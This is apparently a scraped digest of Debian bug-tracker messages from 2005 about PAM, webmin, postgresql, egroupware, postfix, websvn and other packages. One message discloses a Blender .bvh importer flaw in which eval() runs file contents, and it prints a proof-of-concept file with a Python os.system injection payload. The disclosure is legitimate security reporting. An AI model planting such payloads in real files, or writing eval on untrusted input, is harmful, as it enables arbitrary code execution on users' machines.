This becomes a problem in gdm. It uses its own PAM config file so the
gdm maintainer needs to do the same than us...or wait for PAM 0.79-2
correcting this.

Er, you're apparently basing that conclusion on a 6-year-old report about a
problem which doesn't actually resemble yours.

And neither ssh nor cron have *anything* to do with /bin/login. Which
doesn't make this a critical bug in login, it makes it impossible that it's
a bug in login.

The error message in question comes from a PAM_ABORT return from the
Linux-PAM library, which has also just been upgraded in unstable; and I see
that you're running the newest version. However, this error is not
reproducible here, or on the systems of most other users, so I'll need
information about the contents of your /etc/pam.d/ configuration in order to
debug it.

2005-09-30 Thread Paul van der Holst
Package: webmin
Version: 1.230-1
Severity: grave
Justification: renders package unusable

I have 2 debian boxes running, both are using "unstable" release.
On both i got the same problem, which is that my cronjobs for other
users aren't showing correctly...

Also when i want to add a new cronjob for the user root, which should work..
it wont show up in the menu.. when i check with my commandline..
i can see it.. same as the other users cron's..

Hopefully this can be fixed.. but sadly webmin doesn't support debian very
well...
Do something about that for crying out loud

Bug#320049: postgresql: krb5 authentication and multihomed server hosts

2005-09-30 Thread Martin Pitt
Hi pod!

pod [2005-07-26 18:11 +0100]:
> It is not always possible to use krb5 authentication to a server that is
> listening on multiple interfaces other than to the 'primary' interface.

I asked the upstream developers about this, they replied with:

- snip
I think this is fixed in CVS and will be in 8.1. We now have in
postgresql.conf:

# Kerberos
#krb_server_keyfile = ''
#krb_srvname = 'postgres'
#krb_server_hostname = '(any)' # if not set, matches any
keytab entry
#krb_caseins_users = off
- snip

Can you please verify that 8.1 beta3 behaves better by default
(postgresql-8.1 package from experimental)? You can install an 8.1
cluster in parallel which will not disturb your 8.0 cluster at all.

Your patch looks fine, I will apply it for 8.0 and 7.4, but I'd like
to have this settled upstream for 8.1 to not drag patches forever.

Thanks!

Bug#330594: [dpatch-maintainers] Bug#330594: dpatch: allow custom diff options

2005-09-30 Thread Bastian Kleineidam
Hi Junichi,

On Fri, Sep 30, 2005 at 07:37:27AM +0900, Junichi Uekawa wrote:
> If you can provide information backing up that it works reliably,
> patch will be accepted.
I use the attached patch (just adding of the options to the diff
call). After setting DPEP_DIFF_OPTIONS="-p" my C source patches have the
function in the dpatch (see patch_c_source.diff).
All other file types (eg. a Makefile, see patch_no_c_source.diff) have
also a (fake) function line, but since diff ignores the stuff after
the @@, it works.

As for reliability, I think the diff tool and its options are very
stable and tested.
And of course it is a custom and explicitly set option. If it does
not work then I would just not add it to DPEP_DIFF_OPTIONS.

Just a thought: perhaps it would be better to name it
DPEP_DIFF_EXTRA_OPTIONS, since the standard dif options (-urNad) are
always there.

  Bastian

Bug#330868: sudo: init script changes time of directories, not stamp files

2005-09-30 Thread Martin Pitt
Package: sudo
Version: 1.6.8p9-2
Tags: patch

Hi Bdale!

The init script currently touches /var/run/sudo/*, but this does not
touch the user's stamp files, only the per-user directories. I made
this a bit more robust:

  http://patches.ubuntu.com/patches/sudo.fixtimestampclean.diff

it uses find -type f now.

It is no big deal since normally bootclean.sh purges /var/run anyway,
so it only matters under very exceptional conditions. But still it
should either do the right thing or just remove /var/run/sudo
completely.

Thanks!

Of course. Or foo=`bar` || true, or foo=`bar || :` or whatever.

More robust, but not much more. If some error happens in the script the
Xsession is broken again (see other bug report).

A quick check over my archive showed that it's included until

If you think this is intentional, feel free to just close this bug, but
please consider to remove a stale conffile in postinst or somewhere like
that then.

Bug#330871: boa should check for sendfile() returning ENOSYS

2005-09-30 Thread Samuel Thibault
Package: boa
Severity: important

Hi,

When serving big files, boa uses sendfile(), but this function is not
available in every kernel. on 2.4.27-2-sparc64 for instance, I get

140.77.128.4 - - [30/Sep/2005:07:59:48 +] request "GET /adresses.txt
HTTP/1.0" ("/var/www/adresses.txt"): sendfile write: Function not implemented

in the log, and the file is not served.

Boa should check for sendfile() returning ENOSYS, and then fall back to
a read/write loop.

Regards,
Samuel

Ok. I've found one problem already which should be fixed; it may be causing
the problem you're experiencing, although I would have thought you would
notice the resulting segfaults it causes...

Anyway, could you try rebuilding the PAM package with the attached patch,
and let me know whether it fixes your problem? Can you also forward your
full PAM config to the BTS?

Bug#330873: egroupware: missing IPv6 support

2005-09-30 Thread Repasi Tibor
Package: egroupware
Version: 1.0.0.007-2.dfsg-2sarge1
Severity: important

While loging in to egroupware from a client with IPv6 address login.php
is trying to insert the client address to phpgw_sessions table in the DB.
The field for client ip address is a character varying(32) which is too small
for an IPv6 address. Due to this, login.php is failing to create a user
session and eGroupWare will stop with a Database error.

I've installed the database to a PostgreSQL DBMS (installed on the same host,
from standard Debian sarge packages).

Bug#330336: Patch for NMU 2.0.7-1.2

2005-09-30 Thread Jeremy T. Bouse
Next time you think about doing an NMU make sure it is fully
functional. Even the NMU you did would have failed to build on arm, m68k
and hppa. I have spent the past 48 hours working on the proper fix for
it. My current 2.0.7-3 doesn't even fix it yet and you're NMU didn't
even come close.

I knew the upstream release was secondary to the transition. Had you
taken proper attempts at communication with the maintainer you would
have been able to determine the issues I was already working on before I
dealt with the new version.

I fail to see how you're jumping the gun did anything to help. The
only package currently held up with the libfwbuilder package issue is
fwbuilder itself. So it was not holding up the Qt/KDE transition. You
also failed to even acknowledge #323133, which by itself was not
directly apparent from the bugs you attempted to close, that has a
direct impact on the build. If you only built on i386 or any other arch
besides the three it affects you would not have known that unless you
had actually had some communication with me. Instead you were impatient
to get went ahead without all the facts in the situation.

Next time I would appreciate you not NMU *ANY* of my packages
without direct direction to do so from me, the DPL or the release
manager as you obviously failed to research the situation.

Regards,
Jeremy

 I have included you wrongly in the Debbugs-Cc list for
 bonobo-activation: it is a dead GNOME 2 module which has been merged in
 another module and is completely useless and deprecated.

Hi,

When opening a file with O_DIRECT, buffers given to read/write must be
aligned with blocks. If it is not the case, they return EINVAL. The
manpage should document that: turn

   EINVAL fd is attached to an object which is unsuitable for reading.

into

   EINVAL fd is attached to an object which is unsuitable for

Well, I can't, so I need more even more information.

Is this a new install without previous firebird packages installed? Or is it
upgrade? From which versions? Maybe you are attempting to move from
firebird2-classic-server to firebird2-super-server and there are open
connections to port 3050 left over?

what is the exact apt-get transcript?

Aha, now this is a much more promising line of investigation. Compare with
the new bug report which just came in, regarding the same subject:

On Fri, Sep 30, 2005 at 09:23:03AM +0300, Mait Vares wrote:
> if i have 'auth required pam_wheel.so group=foo' in /etc/pam.d/su, then
> root can't su when he is not member of group 'foo'.
> this is normal behavior from now or just annoying bug?

I think the answer is pretty clearly that this is normal behavior. The
commented out default entry in my /etc/pam.d/su file says:

# Uncomment this to force users to be a member of group root
# before they can use `su'. You can also add "group=foo" to
# to the end of this line if you want to use a group other
# than the default "root".
# (Replaces the `SU_WHEEL_ONLY' option from login.defs)
# auth   required   pam_wheel.so

There is no mention here that pam_wheel should for some reason treat root
*differently* than other users; so if it did that before, I think it was
only because of a bug in the *old* version of pam_wheel.

If you two can confirm that this bug is fixable by adding root to the
specified group ("adm", "foo", whatever), *and* that it is fixable by
listing 'auth sufficient pam_rootok.so' *before* pam_wheel, then I'll go
ahead and reassign these bugs to the login package, requesting that the
examples be reordered to follow the pam_rootok stanza.

Thanks,

You are questioning the value of a wishlist item informing BTS readers
of a new release? You must have a lot of time on your hands. I would
advise you to do something better with it than quibbling (on false
grounds) about whether people should or should not file wishes for things.

Since you do quibble, I will say that as a user and as a developer of
other Debian packages I want to begin testing some of the features
that have been added to coreutils since 5.2.1 was released.

I recently setup sympa with a robot config. As per
http://localhost/doc/sympa/html/node12.html I created the directory and
file /etc/sympa/lists.mydomain.com/robot.conf.

However after some debugging, I know I also needed to create
/var/lib/sympa/expl/lists.mydomain.com/, and set the owner to
sympa:sympa and the permissions to 0750.

Can the documentation be updated to reflect this?

Bug#330880: xtla: `tla-edit-log' triggers a bug in Emacs or Xt

2005-09-30 Thread Ludovic Courtes
Package: xtla
Version: 1.1-1
Severity: normal

Hi,

The `tla-edit-log' command, on my machine, sometimes hangs GNU Emacs under X11
(I'd say it hangs once every 10 `tla-edit-log' calls or so). More precisely,
Emacs hangs while typing text into the syntax-highlighted buffer provided by
`tla-edit-log'. This is something I've only experienced while typing text in
`tla-edit-log''s buffer.

At first sight, it seems to be related either to X, Xt, or Emacs' X GUI.
However, although it does not directly relate to `xtla', I thought
reporting this bug against `xtla' might help since other people may
experience the same problem.

The only debugging information I can offer so far is the call stack of
Emacs I got by attaching GDB after it hanged (and there are no debugging
symbols):

I'm hoping others have the same problem... ;-)

Bug#330881: modifies $LANG, breaking unicode support

2005-09-30 Thread Wouter Verhelst
Package: rxvt-unicode
Version: 5.6-1
Severity: normal

Hi,

My /etc/environment contains:

LANGUAGE="nl_BE:nl:en_GB:en"

[EMAIL PROTECTED]

meaning, I prefer to be having unicode output. I recently switched to
using rxvt-unicode as my preferred x-terminal-emulator; however, I found
that something somewhere along the line between reading /etc/environment
and starting the shell is parsing my $LANG and changing it:

[EMAIL PROTECTED]:~$ echo $LANG
[EMAIL PROTECTED]

If I start xterm rather than urxvt or x-terminal-emulator, the
environment variable does correctly contain UTF-8 as the encoding.

Having a terminal emulator that does support unicode but disables it, is
pretty silly IMHO.

Well, I think someone has told us previously these kind of things. I am
all
for this change, as I hate having 'useless' dependencies. Who is the culprit
of ccp dependency? Imake, if I am right. Maybe even split imake from xutils,
keeping xutils and imake packages insteas of xutils-misc and xutils-dev.

What do you think?

Can you try to alter the type of the field to something larger and try again?
I just want to make sure that there aren't any other problems preventing IPv6
support.

I have a system (sid dist-upgraded today) where I get this error (with
cron):

| Sep 30 10:30:01 bacterio CRON[19683]: (pam_unix) session opened for user root
by (uid=0)
| Sep 30 10:30:01 bacterio CRON[19683]: Critical error - immediate abort

On my desktop (also sid dist-upgraded today). Cron works perfectly.

Attached is a tarball of /etc/pam.d of the failing system.

Installing libpam0g=0.79-1 libpam-modules=0.79-1 libpam-runtime=0.79-1
makes the error disapear.

Please, let me know if I can provide any additional information.

Thanks.

I think this is a side effect of #330291.

In 1:4.0.12-3, we did not distribute /etc/pam.d/su, so this is normal that
4.0.12-5 considers that this file was created by you.

If you or another shadow maintainer agree, I think we can close this bug.

Bug#330882: base-passwd: getting shells in sync with what package tiger (security auditor) recommends

2005-09-30 Thread Rogério Brito
Package: base-passwd
Version: 3.5.10
Severity: wishlist

Hi there, Colin.

I recently installed some packages in my box to learn more about its
security and vulnerabilities and, one of them, tiger gives some quite
sensible recommendations.

One of them is that the users backup, list and nobody (among others)
should not have shells that are listed in /etc/shells.

I tried changing their shells to something like /bin/false (which is
what Dan Bernstein once recommended, if I am not mistaken), but,
unfortunately, upon reinstallation of base-passwrd (due to some
filesystem corruption), it offered to change back the shells to things
listed in /etc/shells.

Some of the recommendations given by tiger are really meaningful and I
think that they should be followed for making a default Debian install a
step closer to being more secure.

Thanks for your efforts, Rogério Brito.

does this mean cpio -i --no-absolute-filenames?

Thanks for the very useful clarification. I've found that the problem is
that mountvirtfs doesn't mount properly shm on boot (there is a /dev/shm
node but has wrong permissions: drwxr-xr-x). If I manually stop the
service mountvirtfs and then start it gain, shm is mounted properly
with the right permissions (drwxrwxrwxt). Only restarting the service
seems to not work. I've noted that I have the same problem with devpts:
it's mounted only after stopping and starting mountvirtfs.

Thanks again for the clarifications. I understand that my request doen't
have sense because the mounting of shm should be transparent to the user
(but it's not transparent for me now).

I've done a quick search and I've found this bug #317329 for sysv-rc.
What you suggest to do? Have I to fill a bug to sysv-rc?

Bug#326672: lirc-modules-source: Unresolved symbols with kernels >=2.6.13

2005-09-30 Thread Peter Colberg
Package: lirc-modules-source
Version: 0.7.1pre2-9
Tags: patch
Followup-For: Bug #326672

I'm experiencing exactly the same problem with kernel 2.6.13.2
using the `lirc_serial' driver. The following kernel messages are
generated upon trying to load the relevant modules:

lirc_dev: Unknown symbol class_simple_device_add
lirc_dev: Unknown symbol class_simple_destroy
lirc_dev: Unknown symbol class_simple_device_remove
lirc_dev: Unknown symbol class_simple_create
lirc_serial: Unknown symbol lirc_unregister_plugin
lirc_serial: Unknown symbol lirc_register_plugin

This problem is due to a sysfs interface change in kernel 2.6.13
and has been fixed upstream (in version 0.7.2).

An interim solution would be to replace the files `drivers/kcompat.h'
and `lirc_dev/lirc_dev.c' with their respective versions from upstream
version 0.7.2. The attached patch resembles exactly these changes and
results in perfectly working modules for kernels above and below version
2.6.13.

since you (not you Jukka, but the package maintainers :)) are deprecating
/etc/network/options, it would be nice to provide some automatic
transition to procps:/etc/sysctl.conf.

I wrote and attached a small shell script snippet based on your
/etc/init.d/networking, which tries to achieve the current semantics
as much as possible, i.e. it only sets options but never unsets them.
The only reverted semantic is that currently netbase overrides procps
(which is caused by the rcS.d sequence code), while in the script
procps overrides netbase.

You could probably add the snippet to postinst or somewhere similar and
remove /etc/network/options in prerm.
Since /etc/sysctl.conf is a conffile of another package, you should
probably surround the transition by some medium priorized debconf
question.

procps is Priority: required, I don't know if you need to Depend: on it
or Recommend: it then.

Thanks for your work & regards

Yes. I've done it. Changing phpgw_sessions(session_ip) and
phpgw_access_log(ip) both to varchar(40) will solve the problem so long.
However, I don't know where else ip addresses are stored in the db and
if there are any other too small ip fields similar problems can appear
while using a affected module. We are on testing egroupware for our
purposes, I'll report any other problems and changes according to IPv6

Also the fields for storing client ip addresses in phpgw_access_log and
phpgw_sessions are of different types!

The PAM config itself looks fine. Can you please also forward the contents
of your /etc/security/limits.conf?

So you mean that this error only occurs with 0.79-2, *not* with 0.79-1?

Thanks,

Bug#330885: postfix: default configuration should enable use of TLS for stmp as default

2005-09-30 Thread Dominik Kubla
Package: postfix
Version: 2.2.4-1
Severity: wishlist

The default postfix configuration should use TLS when delivering mail if
the receiving host supports it. Please add the following lines to the
default main.cf:

smtp_use_tls = yes
smtp_enforce_tls = no
smtp_tls_enforce_peername = no
smtp_tls_loglevel = 1
smtp_tls_session_cache_database = btree:/var/cache/postfix/smtp_scache

These settings will allow the use of TLS for deliveing mail, while not
enforcing it or any strict checks of the certificate presented.

This also means that the package should include the directory
/var/cache/postfix to store the TLS session cache.

In a related matter: The installation procedure should ask if the
relayhost requires the use of a password and should create appropriate
configuration entries..

Kind regards,
  Dominik Kubla

Bug#330886: gsoap: wsdl2h by default produces '#import "stlvector.h"' statement

2005-09-30 Thread Pavel Shramov
Package: gsoap
Version: 2.7.6c-1
Severity: minor

wsdl2h without flags puts '#import "stlvector.h"' string in
resulting header but stl*.h files are obsolete and not
included in .deb package
(wsdl2h with -s flag is omitting this import statement).

So default behaviour is to include reference to omitted files and
soapcpp2 is unable to create .cpp stubs.

Grmmm. Yes, thanks for pointing this out. I tested it, on
sid+tetex/experimental and sid+texlive, but of course I forgot sid only.

Thanks, I will remember that.

Done that.

Can we circumvent this?

New -1 packages are on the tug server.

install on current sid.
work with texlive
work with tetex/experimental.
lintian clean.
pbuilder clean.

Hope this is better now. Sorry.

Best wishes

You could have asked how to solve it... It's a simple fix as already
done in arts, kdebase, kdelibs and many more...

If you knew this already, why didn't you contact the Debian Qt/KDE Team
as they apparantly already had to deal with it?

May I note that there is no NMU of libfwbuilder nor fwbuilder in the
archive yet...

Sorry again if you take this as an attack, I hope you have fixed
packages ready to upload now?

Cheers

I think that he is right, but in the beginning I had it in Suggests and
got a bug report to move it to Recommends. So I think the solution would
be to put all this into Suggests and add a README.Debian explaining
which packages are needed for which effect. What do you think?

Bug#330891: PHP code owned by www-data

2005-09-30 Thread Jeroen van Wolffelaar
Package: websvn
Version: 1.61-13
Severity: important

First, thanks for packaging websvn, it works very well.

Websvn installs a lot of files owend by www-data, including all of
/usr/share/websvn and /etc/websvn/svn_deb_conf.inc. This is quite an
unnecessary security risk.

/usr/share/websvn should never dynamically be modifyeable anyway, so
should be root:root. Any code that would otherwise attempt to write in
that directory should be patched to use /var/cache, /var/lib, or
similar.

Similarly /etc/websvn/svn_deb_conf.inc, it's www-data:www-data,
readable by all.

If by means of some vulnerability or simply by another user with access
to using public_html and executing php, that user can completely deface
the websvn site, replace it with random other code, so that only a
reinstall of this package can restore it. Debian policy also states that
package files should never be modified by maintainance scripts, and
files in the package should normally also not be modified in the course
of running the package, as all changes will be lost on package
reinstallation/upgrade.

If for some reason you need www-data only writeable files or www-data
only readeable, you can make it group readable or something like that.

Thanks,

The patch gets weirdly misapplied. It almost looks like a bug in patch

Bug#330883: zsh: For svn revert, _subversion completes deleted files incorrectly

You wrote:
> For "svn revert", when I complete a deleted file, the space isn't

This isn't actually an _subversion issue but a more fundamental file
completion issue. Filename completion adds a slash for directories and
a space for other files. For files that don't actually exist it adds no
suffix because it is unknown whether the file is a normal file or a
directory.

This occurs for the fake-files style as well as files added using the e
glob modifier (which is what _subversion does). Communicating file type
information with fake files would be a very difficult thing to do.

Perhaps we should make it default to a removable space suffix for
non-existing files.

Hi!

I have been found a security vulnerability in Blender that allows to
execute arbitrary code when trying to import a .bvh file. The problem is the
following:

The vulnerable module is a python plugin. This plugin parses the .bvh
files and creates the correspondient objects for Blender. The problem is in the
files bvh_import.py and bvh_export.py but it is "presumably" only exploitable
when importing .bvh files, not when exporting.

Taking a look to the bvh_import.py file I have been found various
python
"eval" calls around the lines 334 and 370. The python "eval" call is EVIL and
should not be used normally. Anyway, the source code of the plugins looks as
follows:

-
321   channelList = []
322   channelIndex = -1
323
324 lineIdx = 1 # An index for the file.
325   while lineIdx < len(lines) -1:
326 #...
327 if lines[lineIdx][0] == 'ROOT' or lines[lineIdx][0] == 'JOINT':
328 # MAY NEED TO SUPPORT MULTIPLE ROOT's HERE!!!, Still unsure weather
multiple roots are possible.??
329
330   print len(parent) * '  ' + 'node:',lines[lineIdx][1],'
parent:',parent[-1]
331
332   name = lines[lineIdx][1]
333 lineIdx += 2 # Incriment to the next line (Offset)
334   offset = ( eval(lines[lineIdx][1]), eval(lines[lineIdx][2]),
eval(lines[lineIdx][3]) )
335 lineIdx += 1 # Incriment to the next line (Channels)
-

As we can see the second (lines[lineIdx][1]), third (lines[lineIdx][2])
and
fourth word of the parsed line will be evaled to get the X, Y and Z values of
the
object but, what about if this is not a number? If it's malicious python code?
One
sample:

-
01 HIERARCHY
02 ROOT name 1 2
03
04 1 2 3 4
05 1 __import__('os').system('touch'+chr(32)+'/tmp/bvh_import_exploit') 3 4
06
07
08
09
10
-

The second word of the 5th line is a correct fragment of python code.
When the
plugin tries to parse the .bvh file the code __import__('os')..., will be
evaled and
the file /tmp/bvh_import_exploit will be created. But, I don't known why, this
proof
of concept doesn't work on my machine so I created a valid exploit that Blender
imports
without any error and/or warnings and creates the file /tmp/bvh_import_exploit.
Attached
goes a valid exploit called exploit

hm.. seems like the latest version of ruby1.8 in unstable (uploaded 3
days ago) breaks raggle (or libyaml-ruby). Thanks for your Report.

Thanks, I wasn't actually aware that they used to do this sort of thing (and
I probably subscribed to the mailing list after they were out).

/etc/environment parsing is currently broken because of some PAM faults,
IIRC.

Whatever it is, it is not caused by rxvt-unicode. I suspect there is
some missconfiguration in your shell startup files. Maybe your urxvt
starts the shell in login mode while xterm does not or the other way
round. Compare the results with +ls and -ls options.

This "test" is not very reliable, use dash (urxvt -e dash) to get
something useful.

Eduard.

Sorry for the confusion, then. I have no clue where that version came
from, though. I'll try to investivate and report back. Pleaes ignore
my report (at least) until then.

Can't be done, /etc/sysctl.conf is a conffile.

This would still be a policy violation, and I do not think that I will
litter the package with more debconf questions anyway.

Bug#330896: ITP: pyflakes -- simple python source checker

2005-09-30 Thread Andrew Mitchell
Package: wnpp
Severity: wishlist

* Package name: pyflakes
  Version : 0.2.0
  Upstream Author : Divmod Inc. <[EMAIL PROTECTED]>
* URL : http://divmod.org/projects/pyflakes
* License : MIT
  Description : simple python source checker

 Pyflakes is a simple program which checks Python source files for errors.
 It is similar to PyChecker in scope, but differs in that it does not execute
 the modules to check them. This is both safer and faster, although it does
 not perform as many checks. Unlike PyLint, Pyflakes checks only for logical
 errors in programs; it does not perform any checks on style.

Bug#330897: locales: POSIX used, but not chosen

2005-09-30 Thread Calum Mackay
Package: locales
Version: 2.3.5-6
Severity: normal

Something odd seems to have happened to my locales, today. Although I
didn't ask for it, the LC settings have changed to POSIX:

diz $ locale
LANG=
LC_CTYPE="POSIX"
LC_NUMERIC="POSIX"
LC_TIME="POSIX"
LC_COLLATE="POSIX"
LC_MONETARY="POSIX"
LC_MESSAGES="POSIX"
LC_PAPER="POSIX"
LC_NAME="POSIX"
LC_ADDRESS="POSIX"
LC_TELEPHONE="POSIX"
LC_MEASUREMENT="POSIX"
LC_IDENTIFICATION="POSIX"
LC_ALL=

which confuses some apps, e.g. Firebird/Thunderbird (non-Debian) since
they're not expecting it.

In addition, starting X via gdm gives me the addition of
LC_CTYPE=en_US.UTF-8, which I also didn't ask for:

locale
LANG=
LC_CTYPE=en_US.UTF-8
LC_NUMERIC="POSIX"
LC_TIME="POSIX"
LC_COLLATE="POSIX"
LC_MONETARY="POSIX"
LC_MESSAGES="POSIX"
LC_PAPER="POSIX"
LC_NAME="POSIX"
LC_ADDRESS="POSIX"
LC_TELEPHONE="POSIX"
LC_MEASUREMENT="POSIX"
LC_IDENTIFICATION="POSIX"
LC_ALL=

Have I mucked something up somewhere without realising it?

thanks much.

cheers,
calum.

 if you use more of the features of fwbuilder than i have, this sort of

I disagree, and I think the best way to deal with this type of problems
is to leave the files on the filesystem. All in all, this is the same
approach used for the users created by maintainers script, isn't it?
